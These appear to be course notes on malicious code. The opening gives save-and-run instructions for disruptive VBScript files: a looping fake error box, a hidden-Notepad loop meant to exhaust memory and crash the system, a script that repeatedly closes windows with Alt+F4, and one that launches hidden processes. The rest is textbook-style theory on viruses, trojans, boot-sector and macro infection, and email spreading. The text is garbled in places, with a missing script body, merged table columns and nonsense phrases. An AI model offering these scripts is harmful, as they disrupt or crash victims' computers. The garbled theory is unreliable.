Virus I
Virus I
Virus I
virus:
1) Open notepad type the following and save it as fakemsg.vbs
do
loop
This script displays a message box with the message "System Error : 432"
The message box gets invoked again and again if it is being closed.
Go to start -> Run -> type the full path with script name.
Output:
To stop a script running under Wscript, you need to stop the process in
Windows Task Manager.
Open Task Manager (right-click the taskbar and select Task Manager, or type
taskmgr in the Run dialog box).
Check wsscript.exe:
2) Crash System :Open notepad type the following and save it as crashsystem.vbs
set ws=CreateObject("wscript.shell")
do
ws.run "notepad",0
loop
This program will infinitely open notepad in hidden mode causing system
memory to overload crash...!
The value "0" in the third line specifies the mode in which the application should
run, here it is hidden mode.
set ws=CreateObject("wscript.shell")
do
ws.sendkeys "%{F4}"
wscript.sleep 5000
loop
To close within 15 seconds then change the value from “5000” to “15000”.
set ws=Createobject("wscript.shell")
for i=1 to 4
ws.run "WISPTIS.EXE",0
next
Malicious code can do nothing - planted, lie dormant, undetected until some event
triggers the code to act. Trigger can be time or date, an event, a condition, a count or
combination.
The agent is the writer of the program or the person who causes its distribution.
Virus:
A virus is a program that can replicate itself and pass on malicious code to other
nonmalicious programs by modifying them.
Transient virus has a life that depends on Resident virus locates itself in memory ;
the life of its host; virus runs when its then it can remain active or be activated as
attached program executes and terminates a stand alone program, even after its
when its attached program ends. attached program ends.
Trojan horse:
Gets automatically installed along with an infected legitimate program.
Once installed on target machine, it can perform various malicious operations like
deleting files, transmitting files to intruder, modifying files, installing other programs
that provide unauthorized access and execute privilege elevation attacks.
Malicious codes:
Logic bomb- a class of malicious code that runs when a specified condition occur.
Trapdoor or backdoor – someone can access the program with special privileges
Rabbit is a virus or worm that self replicates without bound. It tries to exhaust the
resources.
A rabbit might create copies of itself and store them on the disk to completely
fill the disk.
Worm spreads copies of itself as a stand alone program, virus spreads copies of itself as
a program that attaches to or embeds in other programs.
Virus is attached to E-mail. Virus writer convince the victim to open the attachment.
1) Appended viruses:
Virus is attached to original program but has control before and after execution.
If virus is stored on disk, the filename or its size may help in detection.
Virus writer attaches virus to the program that constructs listing of files on disk.
If virus regains control after the listing program that generated list but before the listing
is displayed or printed, the virus could eliminate its entry from listing.
Virus replaces some of the targets and integrate itself into the original code of
the target.
Document viruses:
Implemented within a formatted document, such as a written document,a database, a
slide presentation, a picture or a spreadsheet.
These documents are highly strucutred file that contain both data and
commands(included in macros,variables,procedures,file accesses and system calls).
The virus writer can use any feature of document to perform malicious country.
• It is hard to detect.
• It is easy to create.
In the first case, some virus writers generate a new e-mail message to all addresses in
the victim's address book. These new messages contain a copy of the virus so that it
propagates widely.
• The new first recipient opens the attachment from a friend. For example, the subject
line or message body may read "I thought you might enjoy this picture from our
vacation.“
In the second case, the virus writer can leave the infected file for the victim to forward
unknowingly. If the virus's effect is not immediately obvious, the victim may pass the
infected file unwittingly to other victims.
• After the hardware test, operating systems, is invoked dynamically, perhaps even by a
user's choice, after the hardware test.
• The operating system is software stored on disk. bootstrap (often boot) load copies the
operating system from disk to memory and transfers control to it; because the
operating system figuratively pulls itself into memory by its bootstraps.
• The firmware does its control transfer by reading a fixed number of bytes from a fixed
location on the disk called the boot sector to a fixed address in memory and then
jumping to that address (which will turn out to contain the first instruction of the
bootstrap loader).
• The bootstrap loader then reads into memory the rest of the operating system from
disk.
• To run a different operating system, the user just inserts a disk with the new operating
system and a bootstrap loader.
• When the user reboots from this new disk, the loader there brings in and runs another
operating system. This same scheme is used for personal computers, workstations, and
large mainframes.
• The virus gains control very early in the boot process, before most detection tools are
active
• The files in the boot area are crucial parts of the operating system. To keep users from
accidentally modifying or deleting them with disastrous results, the operating system
makes them "invisible" by not showing them as part of a normal listing of stored files,
preventing their deletion.
Examples of resident code are the routine that interprets keys pressed on the keyboard,
the code that handles error conditions that arise during a program's execution, or a
program that acts like an alarm clock, sounding a signal at a time the user determines.
Resident routines are sometimes called TSRs or "terminate and stay resident" routines.
Virus writers also like to attach viruses to resident code because the resident code is
activated many times while the machine is running.
Each time the resident code runs, the virus does too. Once activated, the virus can look
for and infect uninfected carriers.
For example, after activation, a boot sector virus might attach itself to a piece of
resident code. Then, each time the virus was activated it might check whether any
removable disk in a disk drive was infected and, if not, infect it.
A virus writer can create a virus macro that adds itself to the startup directives for the
application. It also then embeds a copy of itself in data files so that the infection spreads
to anyone receiving one or more of those files.
Libraries are used by many programs, malicious code residing there will have a broad
effect.
libraries are shared among users and transmitted from one user to another, a practice
that spreads the infection.
Finally, executing code in a library can pass on the viral infection to other transmission
media.
Compilers, loaders, linkers, runtime monitors, runtime debuggers, and even virus
control programs are good candidates for hosting viruses because they are widely
shared.